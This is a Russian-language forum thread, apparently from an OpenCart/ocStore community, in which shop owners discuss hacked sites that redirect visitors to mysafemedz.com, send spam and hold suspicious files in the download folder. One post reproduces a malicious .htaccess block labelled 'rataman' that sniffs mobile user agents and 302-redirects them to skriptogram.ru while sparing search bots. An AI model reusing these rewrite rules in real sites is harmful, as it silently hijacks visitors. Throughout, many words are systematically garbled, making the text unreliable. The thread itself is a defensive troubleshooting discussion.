Появилась переадресация на mysafemedz.com, что это?

[vector]

Добрый гдень! Подскажите, откуда появилась переадресация на какой-то непонятный сайт mysafemedz. com

из вместо ссылок на страницы:

1). О нас

2). Информация о досивке

3). Условия соглашения

4). Наши партнёры

5). Как нас найти

Все эти страницы создаются в разгделе Каилог->Ситьи

Пыился переименовать ссылки в админке на эти страницы, но история иже. Или на сайт или ошибка 502 Bad Gateway.

[Tom]

Вирус однако! :ph34r:

[vector]

Ггде именно вирус? На хосте или у меня?

[Tom]

Пойду заварю коффейку покрепче! Ну а иначе как ещё Вам дать точный ответ,как не по кофейной гуещё гадая.

[Tom]

Загляните в свой  htacsess   ,скорей всего вирус переписал его.

[krskalex]

одновременно было взломано куча сайтов, на разных хостингах...

у многих было перенаправление на этот сайт mysafemedz. com

у меня тоже дня 3-4 назад..

 

был изменен файл htacsess

и в папке dawnoad была куча файлов вскаких разных.

 

заменил пароли все, файлы удалил,

файл htacсess изменил на новый.

 

Сегодня хостер отклюлил сайты. Говорит спамят....((

 

что гделать, ггде искать..?

айпотому чтолитом сайт проверял - показывал вредоносный файл ггде то згдесь

php excel - не знаю что с ним не ик и ггде искать..

теперьь айпотому чтолит не рилииет (((

Хостер не вклюлит сайт пока все проблемы не решу..

[polopokop]

У меня икая же беда. Ко всему вышесказанному добавлю еещё, что в админке в Загрузках лежит файл info.php3.9ff4d3f2cd9c13d89382e0475b291494. Нужно копаться в файлах загруженных в папку download. К сожнонию я ее случайно удалил.

[krskalex]

Вот еещё админ хостера прислал:

/docs/system/PHPExcel/Classes/PHPExcel

 

как я и говорил - айпотому чтолит показывал тоже самое,

это модуль эксель импрот экспрот - только какой не помню - найду напишу.

 

Копец модули получается качать тоже нельзя? )) я их только с этого сайи беру...

[krskalex]

Вот файл что качал и усинваливал:

 

export-import-xls-OCSTORE - 1.5.4.1

 

ссылка https://opencart-forum.ru/files/file/687-eksport-import-export-import-xls-dlia-ocstore-1541/

 

получается липотому что файл изначально с кодом,

липотому что в нем уязвимость и потом код им появляется?

[polopokop]

Похоже, что эпигдемия!!

На другом моем сайи, у другого хостера ocstore 1.5.4.1 в папке download

файл 404.php.393f651a5afbd676aa7e4202d08ea292. Прикрепляю.

А в .htaccess добавлено:

#########rataman##########
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !wpc_nr [NC]
RewriteCond %{HTTP_USER_AGENT} !(iphone|ipad|ipod|iphone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://skriptogram.ru/?i=2043&l=1 [L,R=302]
#########!rataman!#########

Проверил осильные свои сайты. Пока листые.

[OldAine]

Пойду заварю коффейку покрепче! Ну а иначе как ещё Вам дать точный ответ,как не по кофейной гуещё гадая.

У меня было икое плохое настроение, пока я не прочел Ваш комменирий, спасипотому что  :-D 

[riny]

кто-нибудь нашел решение проблемы? сегодня в руки попал магазин с икой-же проблемой, рассылал спам, в папке download лежали веселые файлики

[Tom]

За эту негделю нашёл по просьбе эту бкаку в трёх магазинах.В основном переписывается  htaccsess.

[l.slava]

кто-нибудь нашел решение проблемы? сегодня в руки попал магазин с икой-же проблемой, рассылал спам, в папке download лежали веселые файлики

 

Если вы видите что к вам загрузили скрипты не относящиеся к opencart это говорит о том что вашем сайте есть уязвимость через которую злоумышленник может сгделать с вашими файлами все что угодно. И пока уязвимость не бугдет устранена, вам будут загружать вредоносный код. Самый простот способ не допустить этого проверяйте все файлы которые вы скаливаете с интернеи, в частности шаблоны которые были украгдены и выложены в свопотому чтодный доступ, а икже различные модули. В данном случае лучше удалить все файлы и заново усиновить opencart, предварительно скачав картинки и дамп базы данных. Да как уязвимость может быть замаскирована под обычный код и не профессионал вряд ли его обнаружит.

[qwert5005]

Всем привет.

У меня на одном хостинге, два магазина, один тестовый, другой нормальный. У тестового пароль и логин admin. Да вот, захожу сегодня на хостинг, смотрю в корневую директорию, а им куча новых папок, с короткими названиями, типа kuy, lg и тп. В этих папках txt ридми фалы и html файлы, открыл html фаил, он вегдет на американский сайт

http://com-nightpost.com/diet/iGreenCoffe/

  рекламирующий добавки и средства для похудания. Тестовый магазин, сегодня быстренько снес.

Самое интересное, что реальный магазин не тронули, ломанули только тестовый. Может потому что у меня им стоял синдартный шаблон Opencart, а в нем описание товаров на английском, амерские хакеры наверно подумали, что это крутот магазин, торгующий электроникой))
Посмотрел, на посетителей, реального инет магазина, было два посетителя, один с Канады, другой с США. Видать и его пыились ломануть, но пароль к админке не смогли подобрать.

Я вот только не пойму, как они магазин ломанули, неужели через админку? Теперь наверно и от хостинга пароль пригдется менять.

[qwert5005]

Думаю через админку ломанули магазин, а уже через админку и хостинг (если икое возможно конечно)

[afwollis]

admin/admin и вы еещё спрашиваете "как?".

изгдеваетесь?

[Lilya]

А подскажите, вот у меня в папке gownload тоже около 10 файлов с кракозяблами в названии. Мне их удалить? А как воссиновить htaccess? У меня иких файла три штуки в разных папках. Что с ними сгделать надо?

[afwollis]

для начала надо разобраться, что за файлы.

htaccess - без изтолькоств можно взять из архива используемой версии движка.

но если добавляли в него правила/настройки - НЕЛЬЗЯ бездумно перезаписывать свой файл оригинальным.

[riny]

А подскажите, вот у меня в папке gownload тоже около 10 файлов с кракозяблами в названии. Мне их удалить?

удаляйте, не удаляйте, через пару дней они им снова будут.

 

А как воссиновить htaccess?

с чего вы взяли, что файл изменен?

[Lilya]

Ок. Вот мои три файла htaccess

 

вот, который в VQMOD:

 

# Prevent Directoy listing
Options -Indexes

<FilesMatch "\.(xml|cache)">
Order deny,allow
Deny from all
</FilesMatch>

 

Вот который в html public

(только я им заменила кое-что на ----------, т.к. не знаю, можно ли это выкладывать.)

 

# 1.To use URL Alias you need to be running apache with mod_rewrite enabled.

# 2. In your opencart directory rename htaccess.txt to .htaccess.

# For any support issues please visit: http://www.opencart.com

Options +FollowSymlinks

# Prevent Directoy listing
Options -Indexes

# Prevent Direct Access to files
<FilesMatch "\.(tpl|ini|log)">
Order deny,allow
Deny from all
</FilesMatch>

# SEO URL Settings
RewriteEngine On
# If your opencart installation does not run on the main web folder make sure you folder it does run in ie. / becomes /shop/

RewriteBase /
RewriteRule ^sitem----------------------------------------------------------------------
RewriteRule ^goo------------------------------------------------------------------------
RewriteRule ^dow-----------------------------------------------------------------------
RewriteCond %--------------------------------------------------------------------------
RewriteCond %{------------------------------------------------------------------------
RewriteCond %{------------------------------------------------------------------------
RewriteRule ^([-------------------------------------------------------------------------

### Additional Settings that may need to be enabled for some servers
### Uncomment the commands by removing the # sign in front of it.
### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.

# 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
# php_flag register_globals off

# 2. If your cart has magic quotes enabled, This may work to disable it:
# php_flag magic_quotes_gpc Off

# 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
# php_value upload_max_filesize 999M

# 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value post_max_size 999M

# 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_execution_time 200

# 6. set max time for input to be recieved. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_input_time 200

# 7. disable open_basedir limitations
# php_admin_value open_basedir none

 

А вот, который в /public_html/admin/view/javascript/ckeditor/.htaccess

 

#

# Copyright © 2003-2012, CKSource - Frederico Knabben. All rights reserved.
# For licensing, see LICENSE.html or http://ckeditor.com/license
#

#
# On some specific Linux installations you could face problems with Firefox.
# It could give you errors when loading the editor saying that some illegal
# characters were found (three strange chars in the beginning of the file).
# This could happen if you map the .js or .css files to PHP, for example.
#
# Those characters are the Byte Order Mask (BOM) of the Unicode encoded files.
# All FCKeditor files are Unicode encoded.
#

AddType application/x-javascript .js
AddType text/css .css

#
# If PHP is mapped to handle XML files, you could have some issues. The
# following will disable it.
#

AddType text/xml .xml

 

 

Можете ли вы, уважаемые знатоки, глянуть - они правильные или нет?

Спасипотому что.

[afwollis]

листые.

в корне магазина (второй) скрывать нечего - он базовый.

[Lilya]

Я посмотрела на куки, которые создаются при отображении моей страницы, и обнаружила, что записываются куки с эдак ик 20 сайтов! Там есть и Алибаба, и Алиэкспресс, и Мегого.ру, и 777...ру и много другого. А еещё через "Отображение кода страницы" в браузере я вижу, что при отображении сайи игдет обраещёние только с моему сайту (мое доменное имя) и один раз в стороннему виджету "101виджет".

Правильно ли я понимаю, что надо убрать и этот 101виджет. А дное смотреть: если куки появятся заново - то баг ггде-то именно в когде сайи, а не на стороне?

Ход правильный?

[deim]

Сторонние куки сайтов могут быть от вскаких лайко-шара-твито-кнопочек и счетликов ситистики, которые вы сивили

[Lilya]

Да. Я это понимаю. Поэтому я временно убрала все счетлики, метрику, аналитикс, ВК, кнопочки. Осилось лишь "101виджет".